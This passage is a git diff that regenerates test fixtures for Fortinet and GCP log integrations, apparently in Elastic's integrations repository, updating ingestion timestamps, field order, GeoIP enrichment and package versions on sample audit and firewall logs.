osversion=1.4674 mastersrcmac=hilm srcmac=01:00:5e:73:ca:c1 crscore=54.412000 craction=etd crlevel=erspici eventtype=tfug user=atatno service=sed hostname=luptat2613.internal.localhost profile=olupt reqtype=mipsum url=https://www.example.net/Maloru/lapariat.htm?tlabori=rehender#odtempo direction=inbound msg=alorum method=tmollit cat=bori catdesc=antium device_id=reetdo log_id=rchitec pri=medium userfrom=cipitlab adminprof=venia timezone=CT main_type=quid trigger_policy=mwrit sub_type=cid severity_level=lupt policy=adipisc src=10.182.124.88 src_port=116 dst=10.139.144.75 dst_port=5037 http_method=utodi http_url=isiutali http_host=oremeu http_agent=mquaerat http_session_id=conse signature_subclass=mestq signature_id=5535 srccountry=turQuisa content_switch_name=itasper server_pool_name=cidu false_positive_mitigation=ips user_name=modo monitor_status=ela http_refer=https://example.org/unti/niamqu.html?ris=veli#giatnu http_version=tanimide dev_id=ectetur threat_weight=umexer history_threat_weight=nim threat_level=nisiuta ftp_mode=cipitla ftp_cmd=ditautf cipher_suite=oluptasn msg_id=madmin", "event": { - "ingested": "2021-12-09T13:37:31.907361900Z" + "ingested": "2021-12-14T14:43:11.779442557Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-12-14 time=7:24:31 logver=imadm devid=stla devname=cab logid=orr type=olu subtype=quatDu level=low vd=siste srcip=10.151.47.249 srcport=6697 srcintf=lo5632 dstip=10.155.194.6 dstport=3005 dstintf=enp0s6106 poluuid=quatDu sessionid=deFinib proto=HOPOPT action=block policyid=taedic trandisp=ffi duration=130.219000 sentbyte=2693 rcvdbyte=568 devtype=consequ osname=rumw osversion=1.1386 mastersrcmac=temveleu srcmac=01:00:5e:df:96:27 crscore=104.315000 craction=item crlevel=remipsum eventtype=olupt user=usc service=ernat hostname=neavo4796.internal.domain profile=tatemac reqtype=exer url=https://www5.example.com/xea/ssecill.html?quianonn=quun#one direction=internal msg=riame method=uaUte cat=quae catdesc=utlabor device_id=ameius log_id=tate pri=very-high userfrom=lupta adminprof=atemseq timezone=CEST main_type=amcolab trigger_policy=ectobea sub_type=itsedq severity_level=pta policy=remipsu src=10.35.10.19 src_port=3941 dst=10.188.124.185 dst_port=5837 http_method=tali http_url=tasper http_host=amquisn http_agent=esciu http_session_id=iamea signature_subclass=perspi signature_id=7117 srccountry=emaccus content_switch_name=expl server_pool_name=giat false_positive_mitigation=uscipi user_name=dolo monitor_status=tionevol http_refer=https://internal.example.com/uptatema/dutpers.htm?tion=iumdol#ept http_version=Mal dev_id=tquasia threat_weight=ficiad history_threat_weight=roinBC threat_level=eufu ftp_mode=tio ftp_cmd=equatDu cipher_suite=exea msg_id=tasnulap", "event": { - "ingested": "2021-12-09T13:37:31.907366100Z" + "ingested": "2021-12-14T14:43:11.779443219Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/fortinet/manifest.yml b/packages/fortinet/manifest.yml index d4143322123..333d0d84fbf 100644 --- a/packages/fortinet/manifest.yml +++ b/packages/fortinet/manifest.yml @@ -1,6 +1,6 @@ name: fortinet title: Fortinet Logs -version: 1.3.1 +version: 1.3.2 release: ga description: Collect logs from Fortinet instances with Elastic Agent. type: integration diff --git a/packages/gcp/changelog.yml b/packages/gcp/changelog.yml index 5ecd24b356b..03d60b92c92 100644 --- a/packages/gcp/changelog.yml +++ b/packages/gcp/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.2.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json b/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json index d9cdef9c1ad..f1faaf9945b 100644 --- a/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json +++ b/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json @@ -1,15 +1,6 @@ { "expected": [ { - "log": { - "logger": "projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access" - }, - "source": { - "ip": "192.168.1.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "project": { "id": "elastic-beats" @@ -19,6 +10,9 @@ "ecs": { "version": "1.12.0" }, + "log": { + "logger": "projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access" + }, "gcp": { "audit": { "request": { @@ -48,9 +42,12 @@ "service": { "name": "cloudbilling.googleapis.com" }, + "source": { + "ip": "192.168.1.1" + }, "event": { "action": "GetResourceBillingInfo", - "ingested": "2021-12-09T13:37:42.255753100Z", + "ingested": "2021-12-14T14:43:22.923828793Z", "original": "{\"insertId\":\"-uihnmjctwo\",\"logName\":\"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access\",\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"resourcemanager.projects.get\",\"resource\":\"projects/elastic-beats\",\"resourceAttributes\":{}}],\"methodName\":\"GetResourceBillingInfo\",\"request\":{\"@type\":\"type.googleapis.com/google.internal.cloudbilling.billingaccount.v1.GetResourceBillingInfoRequest\",\"resourceName\":\"projects/189716325846\"},\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"destinationAttributes\":{},\"requestAttributes\":{}},\"resourceName\":\"projects/elastic-beats\",\"serviceName\":\"cloudbilling.googleapis.com\",\"status\":{}},\"receiveTimestamp\":\"2019-12-19T00:49:36.313482371Z\",\"resource\":{\"labels\":{\"project_id\":\"elastic-beats\"},\"type\":\"project\"},\"severity\":\"INFO\",\"timestamp\":\"2019-12-19T00:49:36.086Z\"}", "id": "-uihnmjctwo", "kind": "event", @@ -58,7 +55,10 @@ }, "user": { "email": "xxx@xxx.xxx" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -119,7 +119,7 @@ }, "event": { "action": "beta.compute.machineTypes.aggregatedList", - "ingested": "2021-12-09T13:37:42.255762300Z", + "ingested": "2021-12-14T14:43:22.923831390Z", "original": "{\"insertId\":\"-h6onuze1h7dg\",\"logName\":\"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access\",\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":false,\"permission\":\"compute.machineTypes.list\",\"resourceAttributes\":{\"name\":\"projects/elastic-beats\",\"service\":\"resourcemanager\",\"type\":\"resourcemanager.projects\"}}],\"methodName\":\"beta.compute.machineTypes.aggregatedList\",\"numResponseItems\":\"71\",\"request\":{\"@type\":\"type.googleapis.com/compute.machineTypes.aggregatedList\"},\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)\",\"destinationAttributes\":{},\"requestAttributes\":{\"auth\":{},\"time\":\"2019-12-19T00:45:51.711Z\"}},\"resourceLocation\":{\"currentLocations\":[\"global\"]},\"resourceName\":\"projects/elastic-beats/global/machineTypes\",\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2019-12-19T00:45:52.367887078Z\",\"resource\":{\"labels\":{\"location\":\"global\",\"method\":\"compute.machineTypes.aggregatedList\",\"project_id\":\"elastic-beats\",\"service\":\"compute.googleapis.com\",\"version\":\"beta\"},\"type\":\"api\"},\"severity\":\"INFO\",\"timestamp\":\"2019-12-19T00:45:51.228Z\"}", "id": "-h6onuze1h7dg", "kind": "event", @@ -213,7 +213,7 @@ }, "event": { "action": "beta.compute.instances.aggregatedList", - "ingested": "2021-12-09T13:37:42.255766900Z", + "ingested": "2021-12-14T14:43:22.923831907Z", "original": "{\"insertId\":\"yonau2dg2zi\",\"logName\":\"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access\",\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"compute.instances.list\",\"resourceAttributes\":{\"name\":\"projects/elastic-beats\",\"service\":\"resourcemanager\",\"type\":\"resourcemanager.projects\"}}],\"methodName\":\"beta.compute.instances.aggregatedList\",\"numResponseItems\":\"61\",\"request\":{\"@type\":\"type.googleapis.com/compute.instances.aggregatedList\"},\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)\",\"destinationAttributes\":{},\"requestAttributes\":{\"auth\":{},\"time\":\"2019-12-19T00:44:25.198Z\"}},\"response\":{\"@type\":\"core.k8s.io/v1.Status\",\"apiVersion\":\"v1\",\"details\":{\"group\":\"batch\",\"kind\":\"jobs\",\"name\":\"gsuite-exporter-1589294700\",\"uid\":\"2beff34a-945f-11ea-bacf-42010a80007f\"},\"kind\":\"Status\",\"metadata\":{},\"status\":\"Success\"},\"resourceLocation\":{\"currentLocations\":[\"global\"]},\"resourceName\":\"projects/elastic-beats/global/instances\",\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2019-12-19T00:44:25.262379373Z\",\"resource\":{\"labels\":{\"location\":\"global\",\"method\":\"compute.instances.aggregatedList\",\"project_id\":\"elastic-beats\",\"service\":\"compute.googleapis.com\",\"version\":\"beta\"},\"type\":\"api\"},\"severity\":\"INFO\",\"timestamp\":\"2019-12-19T00:44:25.051Z\"}", "id": "yonau2dg2zi", "kind": "event", @@ -298,7 +298,7 @@ }, "event": { "action": "beta.compute.instances.aggregatedList", - "ingested": "2021-12-09T13:37:42.255770400Z", + "ingested": "2021-12-14T14:43:22.923832305Z", "original": "{\"insertId\":\"yonau3dc2zi\",\"logName\":\"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access\",\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"permission\":\"compute.instances.list\",\"resourceAttributes\":{\"name\":\"projects/elastic-beats\",\"service\":\"resourcemanager\",\"type\":\"resourcemanager.projects\"}}],\"methodName\":\"beta.compute.instances.aggregatedList\",\"numResponseItems\":\"61\",\"request\":{\"@type\":\"type.googleapis.com/compute.instances.aggregatedList\"},\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)\",\"destinationAttributes\":{},\"requestAttributes\":{\"auth\":{},\"time\":\"2019-12-19T00:44:25.198Z\"}},\"resourceLocation\":{\"currentLocations\":[\"global\"]},\"resourceName\":\"projects/elastic-beats/global/instances\",\"serviceName\":\"compute.googleapis.com\",\"status\":{\"code\":7,\"message\":\"PERMISSION_DENIED\"}},\"receiveTimestamp\":\"2019-12-19T00:44:25.262379373Z\",\"resource\":{\"labels\":{\"location\":\"global\",\"method\":\"compute.instances.aggregatedList\",\"project_id\":\"elastic-beats\",\"service\":\"compute.googleapis.com\",\"version\":\"beta\"},\"type\":\"api\"},\"severity\":\"INFO\",\"timestamp\":\"2019-12-19T00:44:25.051Z\"}", "id": "yonau3dc2zi", "kind": "event", @@ -386,7 +386,7 @@ }, "event": { "action": "io.k8s.authorization.v1beta1.subjectaccessreviews.create", - "ingested": "2021-12-09T13:37:42.255774900Z", + "ingested": "2021-12-14T14:43:22.923832694Z", "original": "{\"insertId\":\"87efd529-6349-45d2-b905-fc607e6c5d3b\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"RBAC: allowed by ClusterRoleBinding \\\"cert-manager-webhook:auth-delegator\\\" of ClusterRole \\\"system:auth-delegator\\\" to ServiceAccount \\\"cert-manager-webhook/cert-manager\\\"\"},\"logName\":\"projects/foo/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"5555555-6349-45d2-b905-fc607e6c5d3b\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"system:serviceaccount:cert-manager:cert-manager-webhook\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.authorization.v1beta1.subjectaccessreviews.create\",\"resource\":\"authorization.k8s.io/v1beta1/subjectaccessreviews\"}],\"methodName\":\"io.k8s.authorization.v1beta1.subjectaccessreviews.create\",\"request\":{\"@type\":\"authorization.k8s.io/v1beta1.SubjectAccessReview\",\"apiVersion\":\"authorization.k8s.io/v1beta1\",\"kind\":\"SubjectAccessReview\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"group\":[\"system:serviceaccounts\",\"system:serviceaccounts:kube-system\",\"system:authenticated\"],\"nonResourceAttributes\":{\"path\":\"/apis/webhook.cert-manager.io/v1beta1\",\"verb\":\"get\"},\"user\":\"system:serviceaccount:kube-system:resourcequota-controller\"},\"status\":{\"allowed\":false}},\"requestMetadata\":{\"callerIp\":\"10.11.12.13\",\"callerSuppliedUserAgent\":\"webhook/v0.0.0 (linux/amd64) kubernetes/$Format\"},\"resourceName\":\"authorization.k8s.io/v1beta1/subjectaccessreviews\",\"response\":{\"@type\":\"authorization.k8s.io/v1beta1.SubjectAccessReview\",\"apiVersion\":\"authorization.k8s.io/v1beta1\",\"kind\":\"SubjectAccessReview\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"group\":[\"system:serviceaccounts\",\"system:serviceaccounts:kube-system\",\"system:authenticated\"],\"nonResourceAttributes\":{\"path\":\"/apis/webhook.cert-manager.io/v1beta1\",\"verb\":\"get\"},\"user\":\"system:serviceaccount:kube-system:resourcequota-controller\"},\"status\":{\"allowed\":true,\"reason\":\"RBAC: allowed by ClusterRoleBinding \\\"system:discovery\\\" of ClusterRole \\\"system:discovery\\\" to Group \\\"system:authenticated\\\"\"}},\"serviceName\":\"k8s.io\",\"status\":{\"code\":0}},\"receiveTimestamp\":\"2020-08-05T21:07:32.157698684Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2020-08-05T21:07:30.974750Z\"}", "id": "87efd529-6349-45d2-b905-fc607e6c5d3b", "kind": "event", @@ -411,6 +411,18 @@ "logger": "projects/foo/logs/cloudaudit.googleapis.com%2Factivity" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -471,7 +483,7 @@ }, "event": { "action": "v1.compute.images.insert", - "ingested": "2021-12-09T13:37:42.255780100Z", + "ingested": "2021-12-14T14:43:22.923833092Z", "original": "{\"insertId\":\"v2spcwdzmc2\",\"logName\":\"projects/foo/logs/cloudaudit.googleapis.com%2Factivity\",\"operation\":{\"first\":true,\"id\":\"operation-1596664766354-5ac287c395484-fa3923bd-543e018e\",\"producer\":\"compute.googleapis.com\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"user@mycompany.com\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"compute.images.create\",\"resourceAttributes\":{\"name\":\"projects/foo/global/images/windows-server-2016-v20200805\",\"service\":\"compute\",\"type\":\"compute.images\"}}],\"methodName\":\"v1.compute.images.insert\",\"request\":{\"@type\":\"type.googleapis.com/compute.images.insert\",\"family\":\"windows-server-2016\",\"guestOsFeatures\":[{\"type\":\"VIRTIO_SCSI_MULTIQUEUE\"},{\"type\":\"WINDOWS\"}],\"name\":\"windows-server-2016-v20200805\",\"rawDisk\":{\"source\":\"https://storage.googleapis.com/storage/v1/b/foo/o/windows-server-2016-v20200805.tar.gz\"},\"sourceType\":\"RAW\"},\"requestMetadata\":{\"callerIp\":\"67.43.156.13\",\"callerSuppliedUserAgent\":\"google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 19.6.0),gzip(gfe)\",\"destinationAttributes\":{},\"requestAttributes\":{\"auth\":{},\"time\":\"2020-08-05T21:59:27.515Z\"}},\"resourceLocation\":{\"currentLocations\":[\"eu\"]},\"resourceName\":\"projects/foo/global/images/windows-server-2016-v20200805\",\"response\":{\"@type\":\"type.googleapis.com/operation\",\"id\":\"44919313\",\"insertTime\":\"2020-08-05T14:59:27.259-07:00\",\"name\":\"operation-1596664766354-5ac287c395484-fa3923bd-543e018e\",\"operationType\":\"insert\",\"progress\":\"0\",\"selfLink\":\"https://www.googleapis.com/compute/v1/projects/foo/global/operations/operation-1596664766354-5ac287c395484-fa3923bd-543e018e\",\"selfLinkWithId\":\"https://www.googleapis.com/compute/v1/projects/foo/global/operations/4491931805423146320\",\"startTime\":\"2020-08-05T14:59:27.274-07:00\",\"status\":\"RUNNING\",\"targetId\":\"12345\",\"targetLink\":\"https://www.googleapis.com/compute/v1/projects/foo/global/images/windows-server-2016-v20200805\",\"user\":\"user@mycompany.com\"},\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2020-08-05T21:59:27.822546978Z\",\"resource\":{\"labels\":{\"image_id\":\"771879043\",\"project_id\":\"foo\"},\"type\":\"gce_image\"},\"severity\":\"NOTICE\",\"timestamp\":\"2020-08-05T21:59:26.456Z\"}", "id": "v2spcwdzmc2", "kind": "event", @@ -498,6 +510,18 @@ "logger": "projects/foo/logs/cloudaudit.googleapis.com%2Factivity" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -538,7 +562,7 @@ }, "event": { "action": "beta.compute.instances.stop", - "ingested": "2021-12-09T13:37:42.255784900Z", + "ingested": "2021-12-14T14:43:22.923833571Z", "original": "{\"insertId\":\"-c7ctxmd2zab\",\"logName\":\"projects/foo/logs/cloudaudit.googleapis.com%2Factivity\",\"operation\":{\"id\":\"operation-1596646123456-5ac2438b775f6-f8ca1382-e70b6831\",\"last\":true,\"producer\":\"compute.googleapis.com\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"user@mycompany.com\"},\"methodName\":\"beta.compute.instances.stop\",\"request\":{\"@type\":\"type.googleapis.com/compute.instances.stop\"},\"requestMetadata\":{\"callerIp\":\"67.43.156.13\",\"callerSuppliedUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0,gzip(gfe),gzip(gfe)\"},\"resourceName\":\"projects/foo/zones/us-central1-a/instances/win10-test\",\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2020-08-05T16:56:41.315135528Z\",\"resource\":{\"labels\":{\"instance_id\":\"590261181\",\"project_id\":\"foo\",\"zone\":\"us-central1-a\"},\"type\":\"gce_instance\"},\"severity\":\"NOTICE\",\"timestamp\":\"2020-08-05T16:56:40.428Z\"}", "id": "-c7ctxmd2zab", "kind": "event", @@ -613,7 +637,7 @@ }, "event": { "action": "io.k8s.core.v1.nodes.list", - "ingested": "2021-12-09T13:37:42.255788900Z", + "ingested": "2021-12-14T14:43:22.923833957Z", "original": "{\"insertId\":\"94170ac4-6e82-4345-98ad-3c780222d19d\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"\"},\"logName\":\"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"94170ac4-6e82-4345-98ad-3c780222d19d\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.core.v1.nodes.list\",\"resource\":\"core/v1/nodes\"}],\"methodName\":\"io.k8s.core.v1.nodes.list\",\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"GoogleCloudConsole\"},\"resourceName\":\"core/v1/nodes\",\"serviceName\":\"k8s.io\",\"status\":{}},\"receiveTimestamp\":\"2021-04-23T14:47:31.94822935Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2021-04-23T14:47:07.535383Z\"}", "id": "94170ac4-6e82-4345-98ad-3c780222d19d", "kind": "event", @@ -682,7 +706,7 @@ }, "event": { "action": "io.k8s.extensions.v1beta1.ingresses.list", - "ingested": "2021-12-09T13:37:42.255793600Z", + "ingested": "2021-12-14T14:43:22.923834340Z", "original": "{\"insertId\":\"b10a904a-faa4-4e0d-9ec3-7bc6a180196a\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"\",\"k8s.io/deprecated\":\"true\",\"k8s.io/removed-release\":\"1.22\"},\"logName\":\"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"b10a904a-faa4-4e0d-9ec3-7bc6a180196a\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.extensions.v1beta1.ingresses.list\",\"resource\":\"extensions/v1beta1/namespaces/cos-auditd/ingresses\"}],\"methodName\":\"io.k8s.extensions.v1beta1.ingresses.list\",\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"GoogleCloudConsole\"},\"resourceName\":\"extensions/v1beta1/namespaces/cos-auditd/ingresses\",\"serviceName\":\"k8s.io\",\"status\":{}},\"receiveTimestamp\":\"2021-04-23T14:16:36.37362467Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2021-04-23T14:16:07.574776Z\"}", "id": "b10a904a-faa4-4e0d-9ec3-7bc6a180196a", "kind": "event", @@ -751,7 +775,7 @@ }, "event": { "action": "io.k8s.get", - "ingested": "2021-12-09T13:37:42.255799400Z", + "ingested": "2021-12-14T14:43:22.923834752Z", "original": "{\"insertId\":\"e973134d-b4d5-4e2f-92b8-82bba13fdb92\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"RBAC: allowed by ClusterRoleBinding \\\"system:public-info-viewer\\\" of ClusterRole \\\"system:public-info-viewer\\\" to Group \\\"system:unauthenticated\\\"\"},\"logName\":\"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"e973134d-b4d5-4e2f-92b8-82bba13fdb92\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"system:anonymous\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.get\",\"resource\":\"readyz\"}],\"methodName\":\"io.k8s.get\",\"requestMetadata\":{\"callerIp\":\"127.0.0.1\",\"callerSuppliedUserAgent\":\"kube-probe/1.19+\"},\"resourceName\":\"readyz\",\"serviceName\":\"k8s.io\",\"status\":{}},\"receiveTimestamp\":\"2021-04-29T08:19:21.606980385Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2021-04-29T08:19:20.80581Z\"}", "id": "e973134d-b4d5-4e2f-92b8-82bba13fdb92", "kind": "event", @@ -820,7 +844,7 @@ }, "event": { "action": "io.k8s.get", - "ingested": "2021-12-09T13:37:42.255803700Z", + "ingested": "2021-12-14T14:43:22.923835142Z", "original": "{\"insertId\":\"03adfb9f-71a3-4f41-9701-29b5542f4d22\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"RBAC: allowed by ClusterRoleBinding \\\"system:discovery\\\" of ClusterRole \\\"system:discovery\\\" to Group \\\"system:authenticated\\\"\"},\"logName\":\"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"03adfb9f-71a3-4f41-9701-29b5542f4d22\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"system:serviceaccount:kube-system:generic-garbage-collector\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.get\",\"resource\":\"api/v1\"}],\"methodName\":\"io.k8s.get\",\"requestMetadata\":{\"callerIp\":\"::1\",\"callerSuppliedUserAgent\":\"kube-controller-manager/v1.19.8 (linux/amd64) kubernetes/4f6f69f/system:serviceaccount:kube-system:generic-garbage-collector\"},\"resourceName\":\"api/v1\",\"serviceName\":\"k8s.io\",\"status\":{}},\"receiveTimestamp\":\"2021-04-29T08:23:19.71757101Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2021-04-29T08:23:18.899153Z\"}", "id": "03adfb9f-71a3-4f41-9701-29b5542f4d22", "kind": "event", diff --git a/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json b/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json index 8448cb23c6b..11f9e683531 100644 --- a/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json +++ b/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json @@ -96,7 +96,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705390900Z", + "ingested": "2021-12-14T14:43:24.666221289Z", "original": "{\"insertId\":\"1dobeotg13df9f5\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.128.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"10.142.0.10\",\"src_port\":57794},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"local-test\",\"region\":\"us-central1\",\"vm_name\":\"local-adrian-test\",\"zone\":\"us-central1-a\"},\"remote_instance\":{\"project_id\":\"remote-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_vpc\":{\"project_id\":\"remote-beats\",\"subnetwork_name\":\"mysubnet\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"mysubnet\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-06T16:41:45.009675991Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"12345667\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-06T16:41:38.394575419Z\"}", "kind": "event", "action": "firewall-rule", @@ -201,7 +201,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705396900Z", + "ingested": "2021-12-14T14:43:24.666223692Z", "original": "{\"insertId\":\"1dobeotg13df9f7\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.128.0.10\",\"dest_port\":57794,\"protocol\":6,\"src_ip\":\"10.142.0.16\",\"src_port\":80},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"local-test\",\"region\":\"us-central1\",\"vm_name\":\"local-adrian-test\",\"zone\":\"us-central1-a\"},\"remote_instance\":{\"project_id\":\"remote-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_vpc\":{\"project_id\":\"remote-beats\",\"subnetwork_name\":\"mysubnet\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetw